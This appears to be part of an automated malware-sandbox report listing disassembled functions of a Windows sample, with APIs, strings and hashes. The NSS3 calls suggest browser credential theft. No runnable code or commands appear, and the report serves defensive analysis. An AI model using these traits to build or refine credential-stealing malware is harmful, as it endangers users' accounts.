Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Strings

$-<;, xrefs: 0041825C
:+, xrefs: 004181CE
+*/", xrefs: 004182BA
kf, xrefs: 00418416

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted_strcat
String ID: $-<;$+*/"$:+$kf
API String ID: 1138659288-2765919554
Opcode ID: 1b0c46eebfe8a59ab81fef7f3810c510a409407eb99aefa6d41d44f81d3e8179
Instruction ID: bbc5fa7d8495b31bda5dc89a895256d9648518a168c8a285f567c0596adcd820
Opcode Fuzzy Hash: 1b0c46eebfe8a59ab81fef7f3810c510a409407eb99aefa6d41d44f81d3e8179
Instruction Fuzzy Hash: 1C028D70D00259CADF15DFA5C990BEDFBB1AF19304F1081AEE419B7282DB781A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0043A5E6, Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043A5EB
std::_Lockit::_Lockit.LIBCPMT ref: 0043A5F9
int.LIBCPMT ref: 0043A610

Part of subcall function 00409703: std::_Lockit::_Lockit.LIBCPMT ref: 00409714
Part of subcall function 00409703: std::_Lockit::~_Lockit.LIBCPMT ref: 0040972E

std::_Facet_Register.LIBCPMT ref: 0043A64A
std::_Lockit::~_Lockit.LIBCPMT ref: 0043A660
Concurrency::cancel_current_task.LIBCPMT ref: 0043A675

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
String ID:
API String ID: 2251497708-0
Opcode ID: 8da28d98de807ecf371120a3688b963d75b1e9e2796adba88c70522f423f566b
Instruction ID: 1b671ef6c59355c3337e8e153c21f328b4ee3e00f52423c5d6ae957731a9b330
Opcode Fuzzy Hash: 8da28d98de807ecf371120a3688b963d75b1e9e2796adba88c70522f423f566b
Instruction Fuzzy Hash: 6E112172D10115EBCB04EBA5C806ABF7764EF58728F10062FF851A7282DB789D00CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0043A6AC, Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043A6B1
std::_Lockit::_Lockit.LIBCPMT ref: 0043A6BF
int.LIBCPMT ref: 0043A6D6

Part of subcall function 00409703: std::_Lockit::_Lockit.LIBCPMT ref: 00409714
Part of subcall function 00409703: std::_Lockit::~_Lockit.LIBCPMT ref: 0040972E

std::_Facet_Register.LIBCPMT ref: 0043A710
std::_Lockit::~_Lockit.LIBCPMT ref: 0043A726
Concurrency::cancel_current_task.LIBCPMT ref: 0043A73B

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
String ID:
API String ID: 2251497708-0
Opcode ID: 42856f84c8fe50d840c97780866a0629ca990773a1ce0ca6709d26a5b7a7207f
Instruction ID: 5ba2fc5c3ae075925c79352b4985af9af2bb908a4d5ddd33a0a84bd499be29b8
Opcode Fuzzy Hash: 42856f84c8fe50d840c97780866a0629ca990773a1ce0ca6709d26a5b7a7207f
Instruction Fuzzy Hash: 2B11E132D101259BCB14EBA5D855ABF7774EF88728F10052FF851A7282DB789D01CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00422CE6, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 262COMMON

Download Yara Rule

APIs

NSS_Init.NSS3(?,?,?,?,?,?), ref: 004227B6

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

NSS_Shutdown.NSS3(?,00000001,?,?,?), ref: 00422CC1

Strings

7, xrefs: 00422B17
WKIW, xrefs: 00422A28
#9, xrefs: 00422B57
G, xrefs: 00422A40

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate$InitShutdown
String ID: #9$7$G$WKIW
API String ID: 2192743348-1397076925
Opcode ID: f1888b49bd8ee1bb229af5921e115e72a585a5fb203c9d4aeca1fa8cb652e4ea
Instruction ID: 3f356ab3f001ca719e9731ff8965c6f3fd2e2bb1c5e3e1a71f8955075b4204b4
Opcode Fuzzy Hash: f1888b49bd8ee1bb229af5921e115e72a585a5fb203c9d4aeca1fa8cb652e4ea
Instruction Fuzzy Hash: E0C18B30D04298CAEF15DBA4D951BEDBBB0AF69304F5441EED44837292EB741B89CF29

Uniqueness

Uniqueness Score: -1.00%

Function 00426B76, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426B7B

Strings

m_it.object_iterator != m_object->m_value.object->end(), xrefs: 00426BF1
m_it.array_iterator != m_object->m_value.array->end(), xrefs: 00426BCD
m_object != nullptr, xrefs: 00426B98
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00426B87, 00426B97, 00426BCC, 00426BF0

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$m_it.array_iterator != m_object->m_value.array->end()$m_it.object_iterator != m_object->m_value.object->end()$m_object != nullptr
API String ID: 3519838083-3557933457
Opcode ID: 2633f46ee30e1dce7af4086a71d492daed2116d8cb284fdc922538196d3d70e4
Instruction ID: 5dac4553eb58cb67bf1ddaa7ba34fed1eb637e16824751684e4034dbfe2a5be6
Opcode Fuzzy Hash: 2633f46ee30e1dce7af4086a71d492daed2116d8cb284fdc922538196d3d70e4
Instruction Fuzzy Hash: 7421F0307002109BC714EB5AD892EAAB7B4EF81718F55806FE486A7682D7ADAD44CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00444732, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,004447F3,00000000,00000FA0,0048BA44,00000000,?,0044491E,00000004,InitializeCriticalSectionEx,0046F52C,InitializeCriticalSectionEx,00000000), ref: 004447C2

Strings

api-ms-, xrefs: 00444782

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 467092fd28b44278f2e42a73788f31ccf4b46487d1dd9a34cceeb5f7ec7b4dc6
Instruction ID: 3b02404eba06537680092bea4a821423ad8daff009a81e922f8f1e142575d85b
Opcode Fuzzy Hash: 467092fd28b44278f2e42a73788f31ccf4b46487d1dd9a34cceeb5f7ec7b4dc6
Instruction Fuzzy Hash: B211CA76E41521ABFF224B689C45B5A73949F82764F154132E910FB3C0E7B8ED0286DE

Uniqueness

Uniqueness Score: -1.00%

Function 00446C43, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00446C38,00457287,?,00446C00,00000000,?,00457287), ref: 00446C58
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00446C6B
FreeLibrary.KERNEL32(00000000,?,?,00446C38,00457287,?,00446C00,00000000,?,00457287), ref: 00446C8E

Strings

CorExitProcess, xrefs: 00446C63
mscoree.dll, xrefs: 00446C51

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 6f747d6073583924e2a306123961ecc6cb666b318c6259bed0b47b83b6364465
Instruction ID: ee7b99c57350bf79ecb4fac4ea45e1210067ee34872e4bcd7f7263def1a7a890
Opcode Fuzzy Hash: 6f747d6073583924e2a306123961ecc6cb666b318c6259bed0b47b83b6364465
Instruction Fuzzy Hash: B3F08230E00218FBEB119F50DD09B9E7A78EF01756F140171F445A1260EBB88E04DA9A

Uniqueness

Uniqueness Score: -1.00%

Function 0045CA1C, Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0045CAA0
__alloca_probe_16.LIBCMT ref: 0045CB66
__freea.LIBCMT ref: 0045CBD2

Part of subcall function 0045918E: RtlAllocateHeap.NTDLL(00000000,?,?,?,004401D2,?,?,00414650,?,?,0041306E,?,?,?,00000000,?), ref: 004591C0

__freea.LIBCMT ref: 0045CBDB
__freea.LIBCMT ref: 0045CBFE

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: d6de3322a0984823a2a787f6390f52866104b4ff3a4309e294aa3231b7fb48f9
Instruction ID: 448ccdf4ceac666b46c4a2e8f445c3caf8736f67bbcb2bc619faa3b7f9344070
Opcode Fuzzy Hash: d6de3322a0984823a2a787f6390f52866104b4ff3a4309e294aa3231b7fb48f9
Instruction Fuzzy Hash: 1A51D67250031AAFEB209E559C82FAB3BAADB44756F15011BFD04A7242D63DEC198698

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA19, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 364COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041AA1E

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Part of subcall function 00415505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,0041A94A,?,?,00000000), ref: 0041551B
Part of subcall function 00415505: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 00415541
Part of subcall function 00415505: CommitTransaction.KTMW32(00000000,?,0041A94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 0041554C

Strings

!}lXlNODSN, xrefs: 0041AA5E
'{j^jHIBUH{, xrefs: 0041AB47
,!, xrefs: 0041AC67

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted_strcat
String ID: !}lXlNODSN$'{j^jHIBUH{$,!
API String ID: 1138659288-4150241439
Opcode ID: b82b9610f1c87faced5c90a71b13be9c6597f71d2385d306a12a92e81cfdec63
Instruction ID: 4f1090c892d8ae7c3e0211310b65ef22603f6978cd539da6ace53d37eb25d9bb
Opcode Fuzzy Hash: b82b9610f1c87faced5c90a71b13be9c6597f71d2385d306a12a92e81cfdec63
Instruction Fuzzy Hash: 88F19D70D01289CBCF15DFA5C990AEDFBB1AF18304F1081AEE415B7282DB785A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041A4CA, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 363COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041A4CF

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Part of subcall function 00415505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,0041A94A,?,?,00000000), ref: 0041551B
Part of subcall function 00415505: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 00415541
Part of subcall function 00415505: CommitTransaction.KTMW32(00000000,?,0041A94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 0041554C

Strings

>, xrefs: 0041A5E1
4hU@[Y]W, xrefs: 0041A509
nc, xrefs: 0041A711

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted_strcat
String ID: 4hU@[Y]W$>$nc
API String ID: 1138659288-2892674260
Opcode ID: 23c2e8a3b728fb0e5289787f88c629476fd03007fe020af7bca9820d446948cd
Instruction ID: 69b4d2af1efff5d51a6b8d1072d60d64673e41b76a7434ce0b1ca36e894e148f
Opcode Fuzzy Hash: 23c2e8a3b728fb0e5289787f88c629476fd03007fe020af7bca9820d446948cd
Instruction Fuzzy Hash: BAF1AE70D01289DBCF15DFA5C590AEDFBB1AF18304F2481AEE415B7282DB385A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041A10D, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041A112

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Strings

TBip, xrefs: 0041A22D
dm|{, xrefs: 0041A224
p, xrefs: 0041A234

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: TBip$dm|{$p
API String ID: 3708980276-1957332360
Opcode ID: 4b4b15ef992ef42d377beb089421a1cc540f2ae0a0c986039cf73a761f92ab22
Instruction ID: 8adcde93a9ef1de87be0b0092f894219ddf417b26770064712094cc799b8c3e8
Opcode Fuzzy Hash: 4b4b15ef992ef42d377beb089421a1cc540f2ae0a0c986039cf73a761f92ab22
Instruction Fuzzy Hash: 3351BF70D05248CBCF01EFEAD5915EEFBB0AF59304F64852EE0157B282DB781A4ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041CAD5, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041CADA

Part of subcall function 0041CC08: __EH_prolog.LIBCMT ref: 0041CC0D

Part of subcall function 0041C9EC: __EH_prolog.LIBCMT ref: 0041C9F1

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 0041C9B7: std::exception::exception.LIBCONCRT ref: 0041C9D8

Strings

parse_error, xrefs: 0041CB0A
6rkw, xrefs: 0041CB6B, 0041CB96
parse error, xrefs: 0041CB41

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocatestd::exception::exception
String ID: 6rkw$parse error$parse_error
API String ID: 3877490255-3452702896
Opcode ID: c93f48d532e5d88aa3dfc595ef904a764f32e346e2d6dc57c0c84638de13ad73
Instruction ID: 619f871298406fe59a0c694d79639b1860845e3fadba83f61e984e9bf45d46c9
Opcode Fuzzy Hash: c93f48d532e5d88aa3dfc595ef904a764f32e346e2d6dc57c0c84638de13ad73
Instruction Fuzzy Hash: 9F314F70D00248DFCB05EFA5C991ADDBBB4EF15304F5080AFE405A3292DB785A89CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0043EAC9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(?,00000000,00000001,00488780,00000000,?,00420971), ref: 0043EB19
CloseHandle.KERNEL32(?,00000000,00000001,00488780,00000000,?,00420971), ref: 0043EB30
CloseHandle.KERNEL32(00000000,00000000,00000001,00488780,00000000,?,00420971), ref: 0043EB45

Strings

qB, xrefs: 0043EB47

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$FileUnmapView
String ID: qB
API String ID: 260491571-3814867072
Opcode ID: 9712e018d1e961cf73ccf0d32716732a4b896ee084bc0a68f4d03d3075c4d1c5
Instruction ID: e977a0ad52390a9479858dad65047066fdb2ac9878eb5a18df951fdaec7b8c6f
Opcode Fuzzy Hash: 9712e018d1e961cf73ccf0d32716732a4b896ee084bc0a68f4d03d3075c4d1c5
Instruction Fuzzy Hash: 27218E709017009FDB22EB2AC885B5BF7E0BF09314F14846FE19A52691D7B8B840CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004243FC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00424408

Part of subcall function 0040903F: ___std_exception_copy.LIBVCRUNTIME ref: 0040905D

std::exception::exception.LIBCMT ref: 00424420

Strings

P>B, xrefs: 00424402, 00424407
P>B, xrefs: 00424400

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$___std_exception_copy
String ID: P>B$P>B
API String ID: 3231571295-939619877
Opcode ID: 4e93054eadd2fe5ede0c78d7ef0f7e29d9dca12dad372d62d1676b1f409477ce
Instruction ID: ce35b15519815ffbb67f81b71231185bf0eb88c8a934b23e7a6a4c5c11c1483f
Opcode Fuzzy Hash: 4e93054eadd2fe5ede0c78d7ef0f7e29d9dca12dad372d62d1676b1f409477ce
Instruction Fuzzy Hash: B6E04F726003046BD704EF56D8C08A7B7ACFB95364300C12BFD048B302D7B4E8158BE5

Uniqueness

Uniqueness Score: -1.00%

Function 0046686E, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0046693E
_free.LIBCMT ref: 00466967
SetEndOfFile.KERNEL32(00000000,0046413C,00000000,0045A93D,?,?,?,?,?,?,?,0046413C,0045A93D,00000000), ref: 00466999
GetLastError.KERNEL32(?,?,?,?,?,?,?,0046413C,0045A93D,00000000,?,?,?,?,00000000), ref: 004669B5

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 2aa08d2edf2c4ee48e59ede22ce0a1a10d6d81f2907a493e3665ac833eea6798
Instruction ID: 797d3279cc2cce8438377f55fbe9cb65b9558afef913def79cecf0957a5e1668
Opcode Fuzzy Hash: 2aa08d2edf2c4ee48e59ede22ce0a1a10d6d81f2907a493e3665ac833eea6798
Instruction Fuzzy Hash: 234185F29006059BDB11ABBA8C46B9E3775EF44324F16051BFD14A7392FB3CC848866A

Uniqueness

Uniqueness Score: -1.00%

Function 0043ED7A, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000000,?,?,?,0041379B,?,?,?,00000000), ref: 0043ED97
GetLastError.KERNEL32(?,?,?,0041379B,?,?,?,00000000,00000000,?,?,00000007), ref: 0043EDA3
WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,0041379B,?,?,?,00000000), ref: 0043EDC9
GetLastError.KERNEL32(?,?,?,0041379B,?,?,?,00000000,00000000,?,?,00000007), ref: 0043EDD5

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 7f6659209fded86330dfa8a48f0bc75e383ea20003062e6b7bd9243538b21101
Instruction ID: 859ff3857c03709ba9d0b23b64cb5ea5ca84e6fecc55aa79cc264395068d32c1
Opcode Fuzzy Hash: 7f6659209fded86330dfa8a48f0bc75e383ea20003062e6b7bd9243538b21101
Instruction Fuzzy Hash: D8011236B01156BB8F221F92DC08C9B3F66EFDD7A0F144025FE0555260DA71C822E7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0046676B, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,00421A56,?,00000000,?,?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD), ref: 00466782
GetLastError.KERNEL32(?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD,00000000,~eD,?,00457EBF,00000010), ref: 0046678E

Part of subcall function 00466754: CloseHandle.KERNEL32(FFFFFFFE,0046679E,?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD,00000000,~eD), ref: 00466764

___initconout.LIBCMT ref: 0046679E

Part of subcall function 00466716: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00466745,0046346C,~eD,?,0045796B,00000000,00000005,~eD,00000000), ref: 00466729

WriteConsoleW.KERNEL32(?,00421A56,?,00000000,?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD,00000000), ref: 004667B3

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ae5fb481802a9fa235141cf9efdc422cb2e1fe685c935f6145ad48c9fe88c6fa
Instruction ID: 763e7f8f878b4b777fd66d5375950774efbffa6078b9868dc8d7e1678cf0744a
Opcode Fuzzy Hash: ae5fb481802a9fa235141cf9efdc422cb2e1fe685c935f6145ad48c9fe88c6fa
Instruction Fuzzy Hash: 41F01236901115BFCF221F96DC049CA7F66EB097A5F064465FA1885120EA71C860DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0043EB8D, Relevance: 6.0, APIs: 4, Instructions: 24COMMON

Download Yara Rule

APIs

CreateSymbolicLinkW.KERNEL32(0040B622,?,?,?,0043EFB8,0040B622,?,00000000,?,0040B05E,?,?,?,?,?), ref: 0043EB9D
GetLastError.KERNEL32(?,0043EFB8,0040B622,?,00000000,?,0040B05E,?,?,?,?,?,?,0040B622,?), ref: 0043EBA7
CreateSymbolicLinkW.KERNEL32(0040B622,?,?,?,0043EFB8,0040B622,?,00000000,?,0040B05E,?,?,?,?,?), ref: 0043EBBB
GetLastError.KERNEL32(?,0043EFB8,0040B622,?,00000000,?,0040B05E,?,?,?,?,?,?,0040B622,?), ref: 0043EBC5

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateErrorLastLinkSymbolic
String ID:
API String ID: 191780330-0
Opcode ID: 557c0450dcf72cd336c77947ed3641629258dc9ac66ee84a76f6f8eeb026ee04
Instruction ID: bfcc5d3bec73c7e3439f6908d7d2abe7d2301890aee706999ffa58237ad5accd
Opcode Fuzzy Hash: 557c0450dcf72cd336c77947ed3641629258dc9ac66ee84a76f6f8eeb026ee04
Instruction Fuzzy Hash: 61E09234905108FF8F02BF92DC04C5E7BAAFF08740F044465F91695031D731D961AB19

Uniqueness

Uniqueness Score: -1.00%

Function 0045293D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004529CD

Strings

pow, xrefs: 004529A5, 004529C2

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 5d3b4b31217a3aca56cef5da44c31b20b25d13a0e8c3bca57b1a042be99e7bd2
Instruction ID: f57b068ca202939e6be089322848423b8956c0ac15da669c57a9b2c85ad371fb
Opcode Fuzzy Hash: 5d3b4b31217a3aca56cef5da44c31b20b25d13a0e8c3bca57b1a042be99e7bd2
Instruction Fuzzy Hash: 81514E61A0410296C7157B15CA4136B2B90EB41B53F244D6BECC5413EBEFBD8CDD9A4F

Uniqueness

Uniqueness Score: -1.00%

Function 0041A31F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041A324

Strings

dm|{, xrefs: 0041A36B
RR, xrefs: 0041A347

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: RR$dm|{
API String ID: 3519838083-3963068849
Opcode ID: 257bf5dc64befaa41eb3be5f5702e539041e3b8fd3ea0fd5cd3c5f2c21cc333d
Instruction ID: b30e87a83c857d55b2fceb9bedb5715a1448a84e52f685d6d7980b7f264c2b1f
Opcode Fuzzy Hash: 257bf5dc64befaa41eb3be5f5702e539041e3b8fd3ea0fd5cd3c5f2c21cc333d
Instruction Fuzzy Hash: 8441C431D052488FCF05EFE9D6915EDFBB1AF59304F24842EE4117B282DB782A4ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A440, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

__EH_prolog2.LIBCMT ref: 0040A447

Strings

", ", xrefs: 0040A50E
: ", xrefs: 0040A4EF

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog2
String ID: ", "$: "
API String ID: 1857396960-747220369
Opcode ID: 3ebb163524b836a58e9336528dcddfb99cc604da141eb6db7052139b9219902c
Instruction ID: 14ddc9e10715370709e437af70b930bef286e9181cfd7794aa4f128aeba5fdd1
Opcode Fuzzy Hash: 3ebb163524b836a58e9336528dcddfb99cc604da141eb6db7052139b9219902c
Instruction Fuzzy Hash: 6231D0B0A01204AFCB14DF65D946BDEFBB5EF44704F10406FE405AB2C1EBB8AA55CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00426CC9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426CCE

Strings

object != nullptr, xrefs: 00426D8C
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00426D87

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: 0ed2f3a0d7ad50c2f0f8df19aab46ac9870abeff396fbdddf03c5da5d77ad745
Instruction ID: d588f42d78a487c8651ebf323b21b14c2d5a598c9bd3e3ab5cf4a9afda7fafb6
Opcode Fuzzy Hash: 0ed2f3a0d7ad50c2f0f8df19aab46ac9870abeff396fbdddf03c5da5d77ad745
Instruction Fuzzy Hash: FE313171B1061A8BC701CF6AD091A6ABBB0FF81304F54811FD049A3751CB38AE40CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00432C77, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00432C7C

Strings

object != nullptr, xrefs: 00432CB3
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00432CAE

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: b42868cca90d7d1ec1062621b609ef91e8d8c9c9e3b68601a94411a22fbaea1d
Instruction ID: a3445ea1db4b01ca46f117caf533ded59e73d085720f748eb158daf7e430debb
Opcode Fuzzy Hash: b42868cca90d7d1ec1062621b609ef91e8d8c9c9e3b68601a94411a22fbaea1d
Instruction Fuzzy Hash: E7212776A002159FDB04DF69D981BEEFBB4FF58304F10812EE445A7391DB78AA05CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0043A929, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043A92E

Strings

true, xrefs: 0043A99E
false, xrefs: 0043A98B

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: false$true
API String ID: 3519838083-2658103896
Opcode ID: 554a9e8c29aeda20e02ce97903ee5a4130f6d8e91c2360f5ad8c9ebe88ee43c1
Instruction ID: 5b8a111ec777184d3b9285b5462081de3ad4d40af5247b6b8f630398567f009f
Opcode Fuzzy Hash: 554a9e8c29aeda20e02ce97903ee5a4130f6d8e91c2360f5ad8c9ebe88ee43c1
Instruction Fuzzy Hash: 4521A1B2940744AEC320EFB5D441B9ABBF8EF09300F00C92FE4E697651EB78A504CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0042C0C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

